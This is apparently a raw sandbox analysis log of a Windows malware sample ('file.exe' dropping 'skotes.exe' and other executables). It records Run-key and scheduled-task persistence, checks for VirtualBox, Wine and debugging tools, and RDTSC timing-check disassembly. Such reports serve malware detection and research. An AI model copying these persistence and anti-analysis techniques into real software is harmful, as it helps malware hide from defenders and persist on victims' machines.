                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ea17d0b77a.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ea17d0b77a.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9434b989db.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9434b989db.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0a99277d48.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0a99277d48.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ceb22082b1.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ceb22082b1.exeJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_3-9744
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeSystem information queried: FirmwareTableInformation
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\1018748001\d5cd5e4aa8.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                    Source: C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                    Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                    Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
                    Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
                    Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
                    Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17D17 second address: D17D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 pushad 0x00000007 jnp 00007F6969412EA6h 0x0000000d jnp 00007F6969412EA6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17E95 second address: D17EB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F6968D54749h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17EB6 second address: D17EC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F6969412EA6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17EC2 second address: D17EC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D17EC6 second address: D17EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6969412EB5h 0x0000000f jg 00007F6969412EA6h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B2E9 second address: D1B2EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B2EF second address: D1B2F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F6969412EA6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B44C second address: D1B452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B452 second address: D1B480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jg 00007F6969412EB3h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6969412EADh 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B480 second address: D1B49A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F6968D5473Ch 0x00000014 jnl 00007F6968D54736h 0x0000001a rdtsc
